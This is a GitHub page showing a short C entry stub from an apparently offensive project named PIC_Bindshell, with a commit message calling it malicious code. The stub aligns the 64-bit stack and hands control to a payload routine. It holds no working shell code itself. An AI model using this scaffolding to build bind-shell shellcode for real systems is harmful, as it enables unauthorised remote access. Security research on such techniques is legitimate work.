Files
Matt Graeber 8e8dbc0406 Initial commit to repo
Apparently, Google doesn't want me to host malicious code on Google
Drive. PIC_Bindshell will live in GitHub now.
2013-08-17 18:44:29 -04:00

10 lines
208 B
C

#if defined(_WIN64)
extern VOID AlignRSP( VOID );
VOID Begin( VOID )
{
// Call the ASM stub that will guarantee 16-byte stack alignment.
// The stub will then call the ExecutePayload.
AlignRSP();
}
#endif